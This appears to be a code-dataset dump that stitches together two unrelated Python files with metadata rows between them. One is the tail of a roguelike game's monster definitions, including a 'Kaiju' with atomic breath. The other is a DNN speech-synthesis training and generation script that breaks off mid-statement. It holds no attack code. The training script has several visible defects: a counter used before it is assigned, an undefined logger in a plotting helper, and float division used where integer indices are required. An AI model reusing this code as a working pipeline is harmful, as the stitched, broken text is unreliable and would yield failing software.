context.DES_EARTH, context.MTY_BOSS )
ENC_LEVEL = 11
VOICE = dialogue.voice.GREEK
COMBAT_AI = aibrain.BruiserAI()
TREASURE = treasuretype.Low()
ATTACK = items.Attack( (2,10,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Poison Breath",
effects.OpposedRoll( def_stat=stats.TOUGHNESS, on_success = (
effects.HealthDamage( (3,6,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_POISON, anim=animobs.PoisonCloud ),
effects.TargetIs( effects.ALIVE, on_true=( effects.OpposedRoll( att_stat=None, def_stat=stats.TOUGHNESS, on_success = (
effects.Enchant( enchantments.PoisonClassic )
,) ), ))
), on_failure = (
effects.HealthDamage( (2,6,0), stat_bonus=None, element=stats.RESIST_POISON, anim=animobs.PoisonCloud )
,) ), com_tar=targetarea.Blast(radius=2), ai_tar=invocations.TargetEnemy(min_distance=3), mp_cost=20, shot_anim=animobs.GreenComet
), )
def init_monster( self ):
self.levels.append( base.Terror( 10, self ) )
self.condition.append( enchantments.PermaMegaRegeneration() )
# ********************************
# *** ENCOUNTER LEVEL 12 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 13 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 14 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 15 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 16 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 17 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 18 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 19 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 20 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 21 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 22 ***
# ********************************
class Kaiju( base.Monster ):
name = "Kaiju"
statline = { stats.STRENGTH: 45, stats.TOUGHNESS: 35, stats.REFLEXES: 16, \
stats.INTELLIGENCE: 3, stats.PIETY: 14, stats.CHARISMA: 14, stats.RESIST_ATOMIC: 50,
stats.RESIST_FIRE: 200, stats.RESIST_POISON: 200, stats.RESIST_LUNAR: 200 }
SPRITENAME = "monster_default.png"
FRAME = 14
TEMPLATES = ()
MOVE_POINTS = 8
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST )
ENC_LEVEL = 22
VOICE = dialogue.voice.DRACONIAN
COMBAT_AI = aibrain.BruiserAI()
TREASURE = None
ATTACK = items.Attack( (4,8,0), element = stats.RESIST_CRUSHING )
TECHNIQUES = ( invocations.MPInvocation( "Atomic Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (10,6,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_ATOMIC, anim=animobs.Nuclear )
,), on_failure = (
effects.HealthDamage( (3,10,0), stat_bonus=None, element=stats.RESIST_ATOMIC, anim=animobs.Nuclear )
,) ), com_tar=targetarea.Cone(reach=8), ai_tar=invocations.TargetEnemy(), mp_cost=60
), )
def init_monster( self ):
self.levels.append( base.Beast( 48, self ) )
self.condition.append( enchantments.PermaMegaRegeneration() )
|
jwvhewitt/dmeternal
|
old_game/monsters/misc.py
|
Python
|
gpl-2.0
| 23,825
|
[
"BLAST"
] |
5fcc74082b819b1c0afe9a6efe8460254395f2b22695c00ee64560929389a40d
|
import pickle
import gzip
import os, sys, errno
import time
import math
# numpy & theano imports need to be done in this order (only for some numpy installations, not sure why)
import numpy
#import gnumpy as gnp
# we need to explicitly import this in some cases, not sure why this doesn't get imported with numpy itself
import numpy.distutils.__config__
# and only after that can we import theano
#import theano
from utils.providers import ListDataProvider
from frontend.label_normalisation import HTSLabelNormalisation, XMLLabelNormalisation
from frontend.silence_remover import SilenceRemover
from frontend.silence_remover import trim_silence
from frontend.min_max_norm import MinMaxNormalisation
from frontend.acoustic_composition import AcousticComposition
from frontend.parameter_generation import ParameterGeneration
from frontend.mean_variance_norm import MeanVarianceNorm
# the new class for label composition and normalisation
from frontend.label_composer import LabelComposer
#from frontend.mlpg_fast import MLParameterGenerationFast
#from frontend.mlpg_fast_layer import MLParameterGenerationFastLayer
import configuration
from models.dnn_cm import DNN
from utils.compute_distortion import DistortionComputation, IndividualDistortionComp
from utils.generate import generate_wav
from utils.learn_rates import ExpDecreaseLearningRate
from io_funcs.binary_io import BinaryIOCollection
#import matplotlib.pyplot as plt
# our custom logging class that can also plot
#from logplot.logging_plotting import LoggerPlotter, MultipleTimeSeriesPlot, SingleWeightMatrixPlot
from logplot.logging_plotting import LoggerPlotter, MultipleSeriesPlot, SingleWeightMatrixPlot
import logging # as logging
import logging.config
import io
def extract_file_id_list(file_list):
file_id_list = []
for file_name in file_list:
file_id = os.path.basename(os.path.splitext(file_name)[0])
file_id_list.append(file_id)
return file_id_list
def read_file_list(file_name):
logger = logging.getLogger("read_file_list")
file_lists = []
fid = open(file_name)
for line in fid.readlines():
line = line.strip()
if len(line) < 1:
continue
file_lists.append(line)
fid.close()
logger.debug('Read file list from %s' % file_name)
return file_lists
def make_output_file_list(out_dir, in_file_lists):
out_file_lists = []
for in_file_name in in_file_lists:
file_id = os.path.basename(in_file_name)
out_file_name = out_dir + '/' + file_id
out_file_lists.append(out_file_name)
return out_file_lists
def prepare_file_path_list(file_id_list, file_dir, file_extension, new_dir_switch=True):
if not os.path.exists(file_dir) and new_dir_switch:
os.makedirs(file_dir)
file_name_list = []
for file_id in file_id_list:
file_name = file_dir + '/' + file_id + file_extension
file_name_list.append(file_name)
return file_name_list
def visualize_dnn(dnn):
layer_num = len(dnn.params) ## including input and output
plotlogger = logging.getLogger("plotting")
for i in range(layer_num):
fig_name = 'Activation weights W' + str(i) + '_' + dnn.params[i].name
fig_title = 'Activation weights of W' + str(i)
xlabel = 'Neuron index of hidden layer ' + str(i)
ylabel = 'Neuron index of hidden layer ' + str(i+1)
if i == 0:
xlabel = 'Input feature index'
if i == layer_num-1:
ylabel = 'Output feature index'
aa = dnn.params[i].get_value(borrow=True).T
print(aa.shape, aa.size)
if aa.size > aa.shape[0]:
logger.create_plot(fig_name, SingleWeightMatrixPlot)
plotlogger.add_plot_point(fig_name, fig_name, dnn.params[i].get_value(borrow=True).T)
plotlogger.save_plot(fig_name, title=fig_name, xlabel=xlabel, ylabel=ylabel)
def load_covariance(var_file_dict, out_dimension_dict):
var = {}
io_funcs = BinaryIOCollection()
for feature_name in list(var_file_dict.keys()):
var_values, dimension = io_funcs.load_binary_file_frame(var_file_dict[feature_name], 1)
var_values = numpy.reshape(var_values, (out_dimension_dict[feature_name], 1))
var[feature_name] = var_values
return var
def train_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False, var_dict=None,
cmp_mean_vector = None, cmp_std_vector = None, init_dnn_model_file = None):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal to %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layer_size = hyper_params['hidden_layer_size']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
model_type = hyper_params['model_type']
hidden_layer_type = hyper_params['hidden_layer_type']
## use a switch to turn on pretraining
## pretraining may not help too much, if this case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
sequential_training = hyper_params['sequential_training']
# sequential_training = True
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProvider(x_file_list = train_x_file_list, y_file_list = train_y_file_list,
n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, sequential = sequential_training, shuffle = True)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProvider(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list,
n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, sequential = sequential_training, shuffle = False)
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_one_partition()
train_set_x, train_set_y = shared_train_set_xy
shared_valid_set_xy, valid_set_x, valid_set_y = valid_data_reader.load_one_partition() #validation data is still read block by block
valid_set_x, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporally we use the training set as pretrain_set_x.
##we need to support any data for pretraining
# pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserve to computer multi-stream distortion
if model_type == 'DNN':
# dnn_model = DeepRecurrentNetwork(n_in= n_ins, hidden_layer_size = hidden_layer_size, n_out = n_outs, L1_reg = l1_reg, L2_reg = l2_reg, hidden_layer_type = hidden_layer_type)
# dnn_model = SequentialDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
# l1_reg = l1_reg, l2_reg = l2_reg,
# hidden_layer_sizes = hidden_layer_size)
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layer_sizes = hidden_layer_size)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.time()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
# finetune_lr = 0.000125
previous_finetune_lr = finetune_lr
print(finetune_lr)
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.time()
while (not train_data_reader.is_finish()):
shared_train_set_xy, train_set_x, train_set_y = train_data_reader.load_one_partition()
n_train_batches = train_set_x.shape[0] / batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.shape[0], n_train_batches, batch_size) )
all_batches = all_batches + n_train_batches
for minibatch_index in range(n_train_batches):
this_train_error = dnn_model.finetune((train_set_x[minibatch_index*batch_size:(minibatch_index+1)*batch_size, :], \
train_set_y[minibatch_index*batch_size:(minibatch_index+1)*batch_size, :]), batch_size, current_finetune_lr, current_momentum)
train_error.extend(this_train_error)
train_data_reader.reset()
logger.debug('calculating validation loss')
predicted_parameter = dnn_model.parameter_prediction(valid_set_x) #, valid_set_y
validation_losses = numpy.sum((predicted_parameter - valid_set_y) ** 2, axis=1)
this_validation_loss = numpy.mean(validation_losses)
this_train_valid_loss = numpy.mean(numpy.asarray(train_error))
sub_end_time = time.time()
loss_difference = this_validation_loss - previous_loss
logger.info('epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
if epoch > 10:
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
# logger.debug('validation loss decreased, so saving model')
if this_validation_loss >= previous_loss:
logger.debug('validation loss increased')
# dbn = best_dnn_model
early_stop += 1
# if early_stop > early_stop_epoch:
# logger.debug('stopping early')
# break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
end_time = time.time()
# cPickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
return best_validation_loss
def dnn_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
file_number = len(valid_file_list)
for i in range(file_number): #file_number
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size / n_ins))]
test_set_x = features.reshape((-1, n_ins))
predicted_parameter = dnn_model.parameter_prediction(test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def dnn_generation_lstm(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
visualize_dnn(dnn_model)
file_number = len(valid_file_list)
for i in range(file_number): #file_number
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size / n_ins))]
test_set_x = features.reshape((-1, n_ins))
predicted_parameter = dnn_model.parameter_prediction_lstm(test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def main_function(cfg):
# get a logger for this main function
logger = logging.getLogger("main")
# get another logger to handle plotting duties
plotlogger = logging.getLogger("plotting")
# later, we might do this via a handler that is created, attached and configured
# using the standard config mechanism of the logging module
# but for now we need to do it manually
plotlogger.set_plot_path(cfg.plot_dir)
#### parameter setting########
hidden_layer_size = cfg.hyper_params['hidden_layer_size']
####prepare environment
try:
file_id_list = read_file_list(cfg.file_id_scp)
logger.debug('Loaded file id list from %s' % cfg.file_id_scp)
except IOError:
# this means that open(...) threw an error
logger.critical('Could not load file id list from %s' % cfg.file_id_scp)
raise
###total file number including training, development, and testing
total_file_number = len(file_id_list)
data_dir = cfg.data_dir
nn_cmp_dir = os.path.join(data_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
nn_cmp_norm_dir = os.path.join(data_dir, 'nn_norm' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
model_dir = os.path.join(cfg.work_dir, 'nnets_model')
gen_dir = os.path.join(cfg.work_dir, 'gen')
in_file_list_dict = {}
for feature_name in list(cfg.in_dir_dict.keys()):
in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, cfg.in_dir_dict[feature_name], cfg.file_extension_dict[feature_name], False)
nn_cmp_file_list = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
nn_cmp_norm_file_list = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)
###normalisation information
norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
### normalise input full context label
# currently supporting two different forms of lingustic features
# later, we should generalise this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension + cfg.appended_input_dim
logger.info('Input label dimension is %d' % lab_dim)
suffix=str(lab_dim)
# no longer supported - use new "composed" style labels instead
elif cfg.label_style == 'composed':
# label_normaliser = XMLLabelNormalisation(xpath_file_name=cfg.xpath_file_name)
suffix='composed'
if cfg.process_labels_in_work_dir:
label_data_dir = cfg.work_dir
else:
label_data_dir = data_dir
# the number can be removed
binary_label_dir = os.path.join(label_data_dir, 'binary_label_'+suffix)
nn_label_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_'+suffix)
nn_label_norm_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_norm_'+suffix)
in_label_align_file_list = prepare_file_path_list(file_id_list, cfg.in_label_align_dir, cfg.lab_ext, False)
binary_label_file_list = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
nn_label_file_list = prepare_file_path_list(file_id_list, nn_label_dir, cfg.lab_ext)
nn_label_norm_file_list = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)
# to do - sanity check the label dimension here?
min_max_normaliser = None
label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
label_norm_file = os.path.join(label_data_dir, label_norm_file)
if cfg.NORMLAB and (cfg.label_style == 'HTS'):
# simple HTS labels
logger.info('preparing label data (input) using standard HTS style labels')
label_normaliser.perform_normalisation(in_label_align_file_list, binary_label_file_list)
remover = SilenceRemover(n_cmp = lab_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(binary_label_file_list, in_label_align_file_list, nn_label_file_list)
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if cfg.NORMLAB and (cfg.label_style == 'composed'):
# new flexible label preprocessor
logger.info('preparing label data (input) using "composed" style labels')
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
logger.info('Loaded label configuration')
# logger.info('%s' % label_composer.configuration.labels )
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension will be %d' % lab_dim)
if cfg.precompile_xpaths:
label_composer.precompile_xpaths()
# there are now a set of parallel input label files (e.g, one set of HTS and another set of Ossian trees)
# create all the lists of these, ready to pass to the label composer
in_label_align_file_list = {}
for label_style, label_style_required in label_composer.label_styles.items():
if label_style_required:
logger.info('labels of style %s are required - constructing file paths for them' % label_style)
if label_style == 'xpath':
in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, cfg.xpath_label_align_dir, cfg.utt_ext, False)
elif label_style == 'hts':
in_label_align_file_list['hts'] = prepare_file_path_list(file_id_list, cfg.hts_label_align_dir, cfg.lab_ext, False)
else:
logger.critical('unsupported label style %s specified in label configuration' % label_style)
raise Exception
# now iterate through the files, one at a time, constructing the labels for them
num_files=len(file_id_list)
logger.info('the label styles required are %s' % label_composer.label_styles)
for i in range(num_files):
logger.info('making input label features for %4d of %4d' % (i+1,num_files))
# iterate through the required label styles and open each corresponding label file
# a dictionary of file descriptors, pointing at the required files
required_labels={}
for label_style, label_style_required in label_composer.label_styles.items():
# the files will be a parallel set of files for a single utterance
# e.g., the XML tree and an HTS label file
if label_style_required:
required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])
logger.debug('label styles with open files: %s' % required_labels)
label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
# now close all opened files
for fd in required_labels.values():
fd.close()
# silence removal
if cfg.remove_silence_using_binary_labels:
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from label using silence feature: %s'%(label_composer.configuration.labels[silence_feature]))
logger.info('Silence will be removed from CMP files in same way')
## Binary labels have 2 roles: both the thing trimmed and the instructions for trimming:
trim_silence(binary_label_file_list, nn_label_file_list, lab_dim, \
binary_label_file_list, lab_dim, silence_feature)
else:
logger.info('No silence removal done')
# start from the labels we have just produced, not trimmed versions
nn_label_file_list = binary_label_file_list
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if min_max_normaliser != None:
### save label normalisation information for unseen testing labels
label_min_vector = min_max_normaliser.min_vector
label_max_vector = min_max_normaliser.max_vector
label_norm_info = numpy.concatenate((label_min_vector, label_max_vector), axis=0)
label_norm_info = numpy.array(label_norm_info, 'float32')
fid = open(label_norm_file, 'wb')
label_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(label_min_vector.size, label_norm_file))
### make output acoustic data
if cfg.MAKECMP:
logger.info('creating acoustic (output) features')
delta_win = cfg.delta_win #[-0.5, 0.0, 0.5]
acc_win = cfg.acc_win #[1.0, -2.0, 1.0]
acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)
if cfg.remove_silence_using_binary_labels:
## do this to get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from CMP using binary label file')
## overwrite the untrimmed audio with the trimmed version:
trim_silence(nn_cmp_file_list, nn_cmp_file_list, cfg.cmp_dim,
binary_label_file_list, lab_dim, silence_feature)
else: ## back off to previous method using HTS labels:
remover = SilenceRemover(n_cmp = cfg.cmp_dim, silence_pattern = cfg.silence_pattern)
remover.remove_silence(nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number],
in_label_align_file_list[0:cfg.train_file_number+cfg.valid_file_number],
nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number]) # save to itself
### save acoustic normalisation information for normalising the features back
var_dir = os.path.join(data_dir, 'var')
if not os.path.exists(var_dir):
os.makedirs(var_dir)
var_file_dict = {}
for feature_name in list(cfg.out_dimension_dict.keys()):
var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
### normalise output acoustic data
if cfg.NORMCMP:
logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
cmp_norm_info = None
if cfg.output_feature_normalisation == 'MVN':
normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)
###calculate mean and std vectors on the training data, and apply on the whole dataset
global_mean_vector = normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number], 0, cfg.cmp_dim)
global_std_vector = normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector, 0, cfg.cmp_dim)
normaliser.feature_normalisation(nn_cmp_file_list[0:cfg.train_file_number+cfg.valid_file_number],
nn_cmp_norm_file_list[0:cfg.train_file_number+cfg.valid_file_number])
cmp_norm_info = numpy.concatenate((global_mean_vector, global_std_vector), axis=0)
elif cfg.output_feature_normalisation == 'MINMAX':
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_min_vector = min_max_normaliser.min_vector
cmp_max_vector = min_max_normaliser.max_vector
cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)
else:
logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
raise
cmp_norm_info = numpy.array(cmp_norm_info, 'float32')
fid = open(norm_info_file, 'wb')
cmp_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(cfg.output_feature_normalisation, norm_info_file))
feature_index = 0
for feature_name in list(cfg.out_dimension_dict.keys()):
feature_std_vector = numpy.array(global_std_vector[:,feature_index:feature_index+cfg.out_dimension_dict[feature_name]], 'float32')
fid = open(var_file_dict[feature_name], 'w')
feature_std_vector.tofile(fid)
fid.close()
logger.info('saved %s variance vector to %s' %(feature_name, var_file_dict[feature_name]))
feature_index += cfg.out_dimension_dict[feature_name]
train_x_file_list = nn_label_norm_file_list[0:cfg.train_file_number]
train_y_file_list = nn_cmp_norm_file_list[0:cfg.train_file_number]
valid_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
valid_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
# we need to know the label dimension before training the DNN
# computing that requires us to look at the labels
#
# currently, there are two ways to do this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension + cfg.appended_input_dim
elif cfg.label_style == 'composed':
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension is %d' % lab_dim)
combined_model_arch = str(len(hidden_layer_size))
for hid_size in hidden_layer_size:
combined_model_arch += '_' + str(hid_size)
nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.%f.nn.model' \
%(model_dir, cfg.combined_model_name, cfg.combined_feature_name, int(cfg.multistream_switch),
combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number, cfg.hyper_params['learning_rate'])
### DNN model training
if cfg.TRAINDNN:
var_dict = load_covariance(var_file_dict, cfg.out_dimension_dict)
logger.info('training DNN')
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_mean_vector = cmp_min_max[0, ]
cmp_std_vector = cmp_min_max[1, ]
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create model directory %s' % model_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
try:
train_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot, var_dict = var_dict,
cmp_mean_vector = cmp_mean_vector, cmp_std_vector = cmp_std_vector)
except KeyboardInterrupt:
logger.critical('train_DNN interrupted via keyboard')
# Could 'raise' the exception further, but that causes a deep traceback to be printed
# which we don't care about for a keyboard interrupt. So, just bail out immediately
sys.exit(1)
except:
logger.critical('train_DNN threw an exception')
raise
### generate parameters from DNN
temp_dir_name = '%s_%s_%d_%d_%d_%d_%d_%d' \
%(cfg.combined_model_name, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layer_size), hidden_layer_size[0])
gen_dir = os.path.join(gen_dir, temp_dir_name)
gen_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.DNNGEN:
logger.info('generating from DNN')
try:
os.makedirs(gen_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create generation directory %s' % gen_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
gen_file_list = prepare_file_path_list(gen_file_id_list, gen_dir, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list)
logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_min_vector = cmp_min_max[0, ]
cmp_max_vector = cmp_min_max[1, ]
if cfg.output_feature_normalisation == 'MVN':
denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
elif cfg.output_feature_normalisation == 'MINMAX':
denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
denormaliser.denormalise_data(gen_file_list, gen_file_list)
else:
